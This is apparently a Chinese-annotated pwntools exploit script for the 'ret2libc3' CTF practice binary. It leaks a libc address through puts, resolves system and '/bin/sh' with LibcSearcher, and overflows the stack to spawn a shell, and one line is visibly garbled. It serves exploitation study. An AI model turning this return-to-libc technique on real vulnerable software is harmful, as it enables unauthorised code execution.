#!/usr/bin/env python"""基本利用思路如下:1)泄露 __libc_start_main 地址2)获取 libc 版本3)获取 system 地址与 /bin/sh 的地址4)再次执行源程序5)触发栈溢出执行 system(‘/bin/sh’)1)详细介绍:a. 当你将puts函数的地址放在栈上,然后通过控制程序流使其执行puts函数,程序会跳转到puts函数的代码,开始执行它。而puts函数通常用于将一个以null结尾的字符串输出到标准输出(终端)。b. 在这种情况下,你将__libc_start_main的GOT(Global Offset Table,全局偏移表)地址作为参数传递给了puts函数。这个GOT表是一个特殊的数据结构,包含了程序中需要调用的外部库函数的地址。其中,__libc_start_main函数在程序启动时被调用,因此GOT表中存储了对该函数的引用。c. 当puts函数被执行时,它会根据传递的地址从GOT表中读取数据,然后将这些数据输出到终端。由于你传递的是__libc_start_main的GOT表地址,puts函数实际上会输出__libc_start_main函数的地址。"""from pwn import *from LibcSearcher import LibcSearchersh = process('./ret2libc3')ret2libc3 = ELF('./ret2libc3')# context(os="linux", log_level='debug')puts_plt = ret2libc3.plt['puts']libc_start_main_plt = ret2libc3.plt['__libc_start_main']libc_start_main_got = ret2libc3.got['__libc_start_main']main = ret2libc3.symbols['main']print("hex(puts_plt): ", hex(puts_plt))print("hex(libc_start_main_got): ", hex(libc_start_main_got))print("hex(libc_start_main_plt): ", hex(libc_start_main_plt))print("hex(main): ", hex(main))print("leak libc_start_main_got addr and return to main again")payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])# sh.sendlineafter('Can you find it !" />.sendlineafter('!?', payload)print("get the related addr")libc_start_main_addr_raw = sh.recv(4)libc_start_main_addr = u32(libc_start_main_addr_raw) print("libc_start_main_addr_raw: ", libc_start_main_addr_raw)print("libc_start_main_addr: ", libc_start_main_addr)print("hex(libc_start_main_addr): ", hex(libc_start_main_addr))libc = LibcSearcher('__libc_start_main', libc_start_main_addr)libcbase = libc_start_main_addr - libc.dump('__libc_start_main')system_addr = libcbase + libc.dump('system')binsh_addr = libcbase + libc.dump('str_bin_sh')print("hex(libcbase): ", hex(libcbase))print("hex(system_addr): ", hex(system_addr))print("hex(binsh_addr): ", hex(binsh_addr))print("get shell")payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])sh.sendline(payload)sh.interactive()

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# CTFWIKI-PWN-ret2libc 讲的非常详细
# pwn学习之ret2libc3——偏移计算初体验 学习了部分技能
# 2019.7.25 ret2libc3 填充从112遍为104 学到了可以用setvbuf进行泄露

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